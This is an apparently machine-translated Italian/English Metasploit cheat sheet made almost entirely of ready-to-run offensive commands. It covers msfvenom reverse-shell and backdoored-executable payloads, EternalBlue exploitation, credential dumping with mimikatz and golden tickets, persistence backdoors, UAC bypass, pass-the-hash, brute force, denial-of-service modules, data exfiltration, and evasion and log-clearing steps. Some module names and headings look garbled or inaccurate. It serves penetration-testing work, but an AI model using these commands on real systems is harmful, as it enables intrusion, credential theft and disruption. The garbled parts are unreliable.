FRONTMATTER_67_# Metasploit Framework Cheat Sheet¶
Panoramica¶
Il Metasploit Framework è il framework di test di penetrazione più utilizzato al mondo, sviluppato da Rapid7. Originariamente creato da H.D. Moore nel 2003, Metasploit si è evoluto nello standard de facto per lo sviluppo, la convalida della vulnerabilità e il test di penetrazione. Il framework fornisce una piattaforma completa per lo sviluppo, il test e l'esecuzione del codice di exploit contro le macchine remote di destinazione, rendendolo uno strumento indispensabile per i professionisti della sicurezza, i tester di penetrazione e gli operatori del team rosso.
L'architettura modulare di Metasploit è costituita da exploit, payload, encoders, nops e moduli ausiliari che possono essere combinati in vari modi per creare scenari di attacco sofisticati. Il framework supporta molteplici interfacce, tra cui il comando-line msfconsole, l'interfaccia web-based e varie API per l'integrazione con altri strumenti di sicurezza. Con oltre 2000 exploit e 500 payload, Metasploit fornisce una vasta copertura per testare le vulnerabilità di sicurezza in diversi sistemi operativi, applicazioni e servizi di rete.
La forza del framework risiede non solo nel suo ampio database di exploit, ma anche nelle sue capacità di generazione del payload, nei moduli post-exploitation e nelle tecniche di evasione. Metasploit consente ai professionisti della sicurezza di simulare attacchi reali, convalidare i controlli di sicurezza e dimostrare l'impatto delle vulnerabilità agli stakeholder. La sua integrazione con altri strumenti di sicurezza e la sua vasta documentazione lo rendono accessibile sia ai principianti che ai professionisti avanzati nel campo della sicurezza informatica.
Installazione¶
Kali Linux Installazione¶
Metasploit viene preinstallato su Kali Linux e può essere aggiornato utilizzando il gestore del pacchetto:
# Update Metasploit on Kali Linux
sudo apt update
sudo apt install metasploit-framework
# Initialize the database
sudo msfdb init
# Start PostgreSQL service
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Verify installation
msfconsole --version
## Ubuntu/Debian Installazione¶
# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Alternative: Manual installation
sudo apt update
sudo apt install curl wget gnupg2 software-properties-common apt-transport-https ca-certificates
# Add Rapid7 GPG key
curl -fsSL https://apt.metasploit.com/metasploit-framework.gpg.key|sudo apt-key add -
# Add repository
echo "deb https://apt.metasploit.com/ lucid main"|sudo tee /etc/apt/sources.list.d/metasploit-framework.list
# Install Metasploit
sudo apt update
sudo apt install metasploit-framework
# Initialize database
sudo msfdb init
CentOS/RHEL Installazione¶
# Install dependencies
sudo yum install curl wget which
# Download and run installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
# Initialize database
sudo msfdb init
# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
Installazione Docker¶
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework
# Run Metasploit in Docker
docker run --rm -it -v "$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4" metasploitframework/metasploit-framework
# Run with database persistence
docker run --rm -it -v "$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4" -v "$\\\\{HOME\\\\}/msf-db:/opt/metasploit-framework/embedded/var/lib/postgresql" metasploitframework/metasploit-framework
# Create alias for easy access
echo 'alias msfconsole="docker run --rm -it -v \"$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4\" metasploitframework/metasploit-framework"' >> ~/.bashrc
source ~/.bashrc
Installazione di Windows¶
# Download installer from official website
# https://windows.metasploit.com/metasploitframework-latest.msi
# Install using PowerShell (requires admin privileges)
Start-Process msiexec.exe -Wait -ArgumentList '/I metasploitframework-latest.msi /quiet'
# Verify installation
& "C:\metasploit-framework\bin\msfconsole.bat" --version
# Initialize database (requires PostgreSQL)
& "C:\metasploit-framework\bin\msfdb.bat" init
macOS Installazione¶
# Install using Homebrew
brew install metasploit
# Alternative: Download installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Initialize database
msfdb init
# Start PostgreSQL
brew services start postgresql
Uso di base¶
Start Metasploit Console¶
# Start msfconsole
msfconsole
# Start with specific database
msfconsole -d msf_database
# Start with custom resource script
msfconsole -r /path/to/script.rc
# Start in quiet mode
msfconsole -q
# Start with specific workspace
msfconsole -w workspace_name
Gestione del database¶
# Initialize database
msfdb init
# Check database status
msfdb status
# Start database
msfdb start
# Stop database
msfdb stop
# Restart database
msfdb restart
# Delete database
msfdb delete
# Reinitialize database
msfdb reinit
Comandi di base della console¶
# Get help
help
?
# Show version information
version
# Exit console
exit
quit
# Clear screen
clear
# Show banner
banner
# Load resource script
resource /path/to/script.rc
# Save command history
history -S /path/to/history.txt
# Load command history
history -L /path/to/history.txt
Comandi core¶
Ricerca e informazione¶
# Search for exploits
search type:exploit platform:windows
search cve:2017-0144
search name:eternal
search rank:excellent
# Search for payloads
search type:payload platform:windows arch:x64
search type:payload platform:linux format:elf
# Search for auxiliary modules
search type:auxiliary name:scanner
# Search for post-exploitation modules
search type:post platform:windows
# Show module information
info exploit/windows/smb/ms17_010_eternalblue
info payload/windows/x64/meterpreter/reverse_tcp
# Show module options
show options
show advanced
show evasion
show targets
show payloads
# Show available exploits
show exploits
# Show available payloads
show payloads
# Show auxiliary modules
show auxiliary
# Show post-exploitation modules
show post
# Show encoders
show encoders
# Show nops
show nops
Modulo Selezione e configurazione¶
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use payload/windows/x64/meterpreter/reverse_tcp
# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Set global options
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50
# Unset options
unset RHOSTS
unset PAYLOAD
# Unset global options
unsetg RHOSTS
# Show current settings
show options
show advanced
# Get option information
info -d RHOSTS
# Set advanced options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate
Target and Payload Management¶
# Show available targets
show targets
# Set specific target
set TARGET 0
set TARGET "Windows 7 SP1 x64"
# Show compatible payloads
show payloads
# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
# Generate payload
generate -f exe -o payload.exe
generate -f elf -o payload.elf
generate -f war -o payload.war
# Show payload options
show options
# Set payload options
set LHOST 192.168.1.50
set LPORT 4444
set EXITFUNC thread
Exploitation Workflow¶
Processo di esplorazione di base¶
# 1. Search for exploit
search ms17-010
# 2. Use exploit module
use exploit/windows/smb/ms17_010_eternalblue
# 3. Show and set options
show options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
# 4. Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444
# 5. Check if target is vulnerable
check
# 6. Run the exploit
exploit
run
# 7. Interact with session
sessions -l
sessions -i 1
Tecniche di esplorazione avanzate¶
# Use specific target
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j
# Exploit with specific options
exploit -z # Don't interact with session
exploit -j # Run as job
exploit -J # Force running in foreground
# Set advanced evasion options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate
# Use encoders for evasion
set ENCODER x86/shikata_ga_nai
set ITERATIONS 3
# Set custom user agent
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Use custom templates
set TEMPLATE /path/to/template.exe
Multi-Target Exploitation¶
# Set multiple targets
set RHOSTS 192.168.1.100-110
set RHOSTS file:/path/to/targets.txt
set RHOSTS 192.168.1.0/24
# Use threading for faster exploitation
set THREADS 10
# Run exploit against all targets
exploit
# Check all targets
check
# Use auxiliary scanner first
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 20
run
Payload Generation¶
MSFVenom Payload Generation¶
# Generate Windows executables
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
# Generate Linux executables
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o payload.elf
# Generate macOS executables
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho
# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o payload.apk
# Generate iOS payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho
# Generate web payloads
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o payload.war
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o payload.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o payload.asp
Encoded Payloads¶
# Encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_payload.exe
# Multiple encoding iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o heavily_encoded.exe
# Use different encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/alpha_mixed -f exe -o alpha_encoded.exe
# Chain multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe
Modelli e formati personalizzati¶
# Use custom template
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -f exe -o backdoored.exe
# Keep template behavior
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -k -f exe -o backdoored.exe
# Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f powershell
# Generate different formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f msi -o payload.msi
Platform-Specific Payloads¶
# Windows payloads
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o vnc.exe
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o ps.exe
# Linux payloads
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o bind.elf
# Multi-platform payloads
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f jar -o payload.jar
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f py -o payload.py
Session Management¶
Comandi di sessione di base¶
# List active sessions
sessions
# List sessions with details
sessions -l
# Interact with session
sessions -i 1
# Kill session
sessions -k 1
# Kill all sessions
sessions -K
# Upgrade shell to meterpreter
sessions -u 1
# Run command on session
sessions -c "whoami" -i 1
# Run script on session
sessions -s /path/to/script.rb -i 1
Session Interaction¶
# Background current session
background
bg
# Return to session
sessions -i 1
# Run local command
!ls
!pwd
!cat /etc/passwd
# Upload file to session
upload /local/file.txt C:\\Windows\\Temp\\file.txt
# Download file from session
download C:\\Windows\\System32\\drivers\\etc\\hosts /tmp/hosts
# Execute command
execute -f cmd.exe -a "/c whoami"
execute -f powershell.exe -a "-Command Get-Process"
# Get system information
sysinfo
getuid
getpid
Gestione avanzata delle sessioni¶
# Route traffic through session
route add 10.0.0.0/24 1
route print
route delete 10.0.0.0/24
# Port forwarding
portfwd add -l 8080 -p 80 -r 192.168.1.100
portfwd list
portfwd delete -l 8080
# Pivot through session
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
# Auto-route through session
use post/multi/manage/autoroute
set SESSION 1
run
Comandi Meterpreter¶
Informazioni di sistema¶
# Get system information
sysinfo
getuid
getpid
ps
# Get environment variables
getenv
getenv PATH
getenv COMPUTERNAME
# Get network configuration
ipconfig
ifconfig
route
# Get system privileges
getprivs
# Check if running as system
getsystem
# Get current directory
pwd
getwd
# List drives
show_mount
Operazioni di File System¶
# Navigate file system
cd C:\\Windows
cd /etc
ls
dir
# Search for files
search -f *.txt
search -f config.* -d C:\\
search -f passwd -d /etc
# Download files
download C:\\Windows\\System32\\config\\SAM /tmp/SAM
download /etc/passwd /tmp/passwd
# Upload files
upload /tmp/payload.exe C:\\Windows\\Temp\\payload.exe
upload /tmp/script.sh /tmp/script.sh
# Edit files
edit C:\\Windows\\Temp\\file.txt
edit /tmp/file.txt
# Delete files
rm C:\\Windows\\Temp\\file.txt
del /tmp/file.txt
# Create directories
mkdir C:\\Windows\\Temp\\test
mkdir /tmp/test
Gestione dei processi¶
# List processes
ps
# Get detailed process information
ps -A
ps -S
# Kill process
kill 1234
# Migrate to process
migrate 1234
migrate explorer.exe
# Execute programs
execute -f cmd.exe
execute -f powershell.exe -a "-Command Get-Process"
execute -f /bin/bash -a "-c 'id'"
# Run as different user
execute -f cmd.exe -u username -p password
# Create process
execute -f notepad.exe -H
Operazioni di rete¶
# Show network connections
netstat
netstat -an
# ARP table
arp
# Network interfaces
ipconfig
ifconfig
# Port forwarding
portfwd add -l 3389 -p 3389 -r 192.168.1.100
portfwd list
portfwd delete -l 3389
# Reverse port forwarding
portfwd add -R -l 8080 -p 80 -r 127.0.0.1
# SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
Registry Operations (Windows)¶
# Enumerate registry keys
reg enumkey -k HKLM\\Software
reg enumkey -k HKCU\\Software
# Query registry values
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
# Set registry values
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"
# Delete registry values
reg deleteval -k HKLM\\Software\\Test -v TestValue
# Delete registry keys
reg deletekey -k HKLM\\Software\\Test
Credential Operations¶
# Dump hashes
hashdump
# Load mimikatz
load mimikatz
wdigest
msv
ssp
tspkg
kerberos
# Load kiwi (newer mimikatz)
load kiwi
creds_all
creds_wdigest
creds_msv
creds_ssp
creds_tspkg
creds_kerberos
# Golden ticket
golden_ticket_create -u Administrator -d domain.com -s S-1-5-21-... -k aes256_key
# Silver ticket
kerberos_ticket_use /path/to/ticket.kirbi
Persistenza¶
# Create persistent backdoor
use exploit/windows/local/persistence
set SESSION 1
set STARTUP SYSTEM
run
# Registry persistence
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"
# Service persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
# Scheduled task persistence
execute -f schtasks.exe -a "/create /tn Backdoor /tr C:\\Windows\\Temp\\backdoor.exe /sc onlogon"
Post-Exploitation Moduli¶
Information Gathering¶
# System enumeration
use post/windows/gather/enum_system
use post/linux/gather/enum_system
set SESSION 1
run
# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_network
set SESSION 1
run
# Credential gathering
use post/windows/gather/credentials/credential_collector
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
set SESSION 1
run
# Application enumeration
use post/windows/gather/enum_applications
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
set SESSION 1
run
# File enumeration
use post/windows/gather/enum_files
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\
set FILE_GLOBS *.txt,*.doc,*.pdf
run
Privilege Escalation¶
# Windows privilege escalation
use post/windows/escalate/getsystem
use post/windows/escalate/bypassuac
use post/windows/escalate/bypassuac_injection
set SESSION 1
run
# Linux privilege escalation
use post/linux/escalate/cve_2021_4034
use post/linux/escalate/sudo_baron_samedit
set SESSION 1
run
# Suggest privilege escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# UAC bypass
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run
Movimento laterale¶
# Pass the hash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
run
# WMI execution
use exploit/windows/local/wmi
set SESSION 1
set RHOSTS 192.168.1.100
run
# PowerShell remoting
use exploit/windows/local/powershell_remoting
set SESSION 1
set RHOSTS 192.168.1.100
run
# SSH lateral movement
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASSWORD password
run
Esfiltrazione dati¶
# File collection
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\Users
set FILE_GLOBS *.doc,*.pdf,*.txt,*.xls
run
# Browser data
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie
set SESSION 1
run
# Email data
use post/windows/gather/outlook
use post/windows/gather/thunderbird_creds
set SESSION 1
run
# Database enumeration
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mysql/mysql_enum
set SESSION 1
run
Persistenza e backdoor¶
# Registry persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
set STARTUP SYSTEM
run
# Service persistence
use post/windows/manage/persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
# Scheduled task
use post/windows/manage/schtask
set SESSION 1
set TASKNAME Backdoor
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
# WMI persistence
use post/windows/manage/wmi_persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
Moduli ausiliari¶
Scanners¶
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,53,80,110,443,993,995
set THREADS 20
run
# Service version detection
use auxiliary/scanner/http/http_version
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.0/24
set THREADS 10
run
# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.0/24
run
# Web application scanning
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_put
set RHOSTS 192.168.1.100
set THREADS 10
run
Brute Force Attacks¶
# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set THREADS 10
run
# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
# HTTP basic auth brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
# SMB brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
Rinnegamento del servizio¶
# TCP SYN flood
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
set RPORT 80
set THREADS 10
run
# HTTP slowloris
use auxiliary/dos/http/slowloris
set RHOST 192.168.1.100
set RPORT 80
run
# SMB DoS
use auxiliary/dos/windows/smb/ms09_001_write
set RHOST 192.168.1.100
run
# WiFi deauth
use auxiliary/dos/wifi/deauth
set INTERFACE wlan0
set BSSID 00:11:22:33:44:55
run
SNMP Enumeration¶
# SNMP community scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
run
# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.100
set COMMUNITY public
run
# SNMP user enumeration
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.100
run
# SNMP process enumeration
use auxiliary/scanner/snmp/snmp_enumprocesses
set RHOSTS 192.168.1.100
run
Integrazione Database¶
Gestione dello spazio di lavoro¶
# List workspaces
workspace
# Create workspace
workspace -a project_name
# Switch workspace
workspace project_name
# Delete workspace
workspace -d project_name
# Rename workspace
workspace -r old_name new_name
# Show current workspace
workspace -v
Host and Service Management¶
# Add hosts
db_import /path/to/nmap_scan.xml
hosts
# Add host manually
hosts -a 192.168.1.100 -n target1 -o "Windows 10"
# Show hosts
hosts
hosts -c address,name,os_name
# Search hosts
hosts 192.168.1.0/24
hosts -S windows
# Delete hosts
hosts -d 192.168.1.100
# Add services
services -a -p 80 -s http -h 192.168.1.100
# Show services
services
services -p 80
services -s http
# Delete services
services -d -p 80 -h 192.168.1.100
Gestione della vulnerabilità¶
# Show vulnerabilities
vulns
# Add vulnerability
vulns -a -h 192.168.1.100 -n "MS17-010" -r "CVE-2017-0144"
# Search vulnerabilities
vulns -S ms17-010
# Show vulnerability details
vulns -v
# Export vulnerabilities
vulns -O /tmp/vulns.xml
Credential Management¶
# Show credentials
creds
# Add credentials
creds -a -h 192.168.1.100 -u administrator -p password123 -t password
# Search credentials
creds -S administrator
# Show credential details
creds -v
# Export credentials
creds -O /tmp/creds.csv
Gestione del botto¶
# Show loot
loot
# Add loot
loot -a -h 192.168.1.100 -t "password_file" -f /tmp/passwords.txt
# Search loot
loot -S password
# Export loot
loot -O /tmp/loot.xml
Tecniche avanzate¶
Sviluppo del modulo personalizzato¶
# Basic exploit module template
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Custom Exploit',
'Description' => 'Custom exploit description',
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [['CVE', '2021-1234']],
'Platform' => 'win',
'Targets' => [['Windows Universal', \\\\{\\\\}]],
'Payload' => \\\\{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d"
\\\\},
'DisclosureDate' => '2021-01-01',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(9999)
])
end
def check
# Vulnerability check logic
return Exploit::CheckCode::Vulnerable
end
def exploit
# Exploitation logic
connect
print_status("Sending payload...")
sock.put(payload.encoded)
handler
disconnect
end
end
# Custom Payload Development¶
# Basic payload module template
require 'msf/core'
module MetasploitModule
CachedSize = 200
include Msf::Payload::Single
include Msf::Payload::Windows
include Msf::Payload::Windows::Exec
def initialize(info = \\\\{\\\\})
super(merge_info(info,
'Name' => 'Custom Windows Payload',
'Description' => 'Custom payload description',
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86))
register_options([
OptString.new('CMD', [true, "Command to execute", 'calc.exe'])
])
end
def generate
# Payload generation logic
cmd = datastore['CMD']||'calc.exe'
# Return shellcode
end
end
Tecniche di evasione¶
# Use encoders
set ENCODER x86/shikata_ga_nai
set ITERATIONS 5
# Use custom templates
set TEMPLATE /path/to/legitimate.exe
# Modify payload behavior
set PrependMigrate true
set PrependMigrateProc explorer.exe
# Use HTTPS for C2
set LHOST 192.168.1.50
set LPORT 443
set HttpsUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Domain fronting
set HttpHostHeader legitimate-domain.com
set LHOST cdn-provider.com
# Custom user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
# Sleep and jitter
set WfsDelay 30
set Jitter 25
Automation and Scripting¶
# Resource scripts
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc
# Load resource script
msfconsole -r handler.rc
# Ruby scripting
irb
framework = Msf::Simple::Framework.create
session = framework.sessions[1]
session.shell_command("whoami")
# Automation script
#!/usr/bin/env ruby
require 'msf/core'
require 'msf/base'
framework = Msf::Simple::Framework.create
exploit = framework.exploits.create('windows/smb/ms17_010_eternalblue')
exploit.datastore['RHOSTS'] = '192.168.1.100'
exploit.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
exploit.datastore['LHOST'] = '192.168.1.50'
exploit.datastore['LPORT'] = '4444'
exploit.exploit_simple('Payload' => exploit.datastore['PAYLOAD'])
Integrazione con altri strumenti¶
Nmap Integrazione¶
# Import Nmap results
db_import /path/to/nmap_scan.xml
# Use Nmap from within Metasploit
db_nmap -sS -O 192.168.1.0/24
db_nmap -sV -p 1-1000 192.168.1.100
# Automated exploitation based on Nmap results
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run
# Use discovered services
hosts -c address,name,os_name
services -c port,proto,name,state
Burp Suite Integrazione¶
# Configure Burp proxy
set Proxies http:127.0.0.1:8080
# Use Burp findings
use auxiliary/scanner/http/dir_scanner
set RHOSTS target.com
set DICTIONARY /path/to/burp_discovered_dirs.txt
run
# Export session for Burp
sessions -l
sessions -C "netstat -an" -i 1 > network_connections.txt
Cobalt Strike Integration¶
# Generate Cobalt Strike compatible payload
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f raw|base64
# Use Cobalt Strike beacon
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 80
exploit -j
# Lateral movement coordination
route add 10.0.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
OSINT Integration¶
# Use theHarvester results
use auxiliary/gather/search_email_collector
set DOMAIN target.com
run
# Shodan integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache city:\"New York\""
run
# Social engineering
use auxiliary/gather/social_engineering_toolkit
set TARGET_EMAIL admin@target.com
run
Risoluzione dei problemi¶
Questioni e soluzioni comuni¶
# Database connection issues
msfdb status
msfdb reinit
sudo systemctl restart postgresql
# Module loading errors
reload_all
updatedb
# Payload generation failures
msfvenom --list formats
msfvenom --list encoders
msfvenom --list platforms
# Session connectivity issues
sessions -l
sessions -k 1
route print
route flush
# Permission issues
sudo chown -R $USER:$USER ~/.msf4
sudo chmod -R 755 ~/.msf4
Ottimizzazione delle prestazioni¶
# Increase database performance
echo "shared_buffers = 256MB"|sudo tee -a /etc/postgresql/*/main/postgresql.conf
echo "effective_cache_size = 1GB"|sudo tee -a /etc/postgresql/*/main/postgresql.conf
sudo systemctl restart postgresql
# Optimize threading
set THREADS 20
set MaxSessions 10
# Memory optimization
ulimit -n 4096
echo "* soft nofile 4096"|sudo tee -a /etc/security/limits.conf
echo "* hard nofile 4096"|sudo tee -a /etc/security/limits.conf
# Clean up old sessions
sessions -K
db_rebuild_cache
Debugging¶
# Enable verbose output
set VERBOSE true
# Debug mode
msfconsole -L -o /tmp/msf.log
# Ruby debugging
irb
load '/usr/share/metasploit-framework/lib/msf/core.rb'
framework = Msf::Simple::Framework.create
# Module debugging
use exploit/windows/smb/ms17_010_eternalblue
set VERBOSE true
check
Considerazioni di sicurezza¶
Sicurezza operativa¶
# Use VPN or proxy
set Proxies socks5:127.0.0.1:9050
# Randomize source ports
set CPORT 1024-65535
# Use legitimate user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Implement delays
set WfsDelay 10
set Jitter 25
# Clean up artifacts
rm /tmp/payload.exe
history -c
Considerazioni giuridiche ed etiche¶
# Document authorization
echo "Authorized penetration test - $(date)" > /tmp/authorization.txt
echo "Scope: 192.168.1.0/24" >> /tmp/authorization.txt
echo "Contact: security@company.com" >> /tmp/authorization.txt
# Limit scope
set RHOSTS 192.168.1.100-110 # Only authorized targets
set ExitOnSession true # Limit session creation
# Avoid destructive actions
set DisablePayloadHandler true
set PrependMigrate false
Protezione dei dati¶
# Encrypt database
msfdb stop
sudo -u postgres pg_dump msf > /tmp/msf_backup.sql
gpg -c /tmp/msf_backup.sql
rm /tmp/msf_backup.sql
# Secure communications
set LHOST 192.168.1.50
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
# Clean up logs
history -c
rm ~/.msf4/logs/*
sudo rm /var/log/postgresql/*
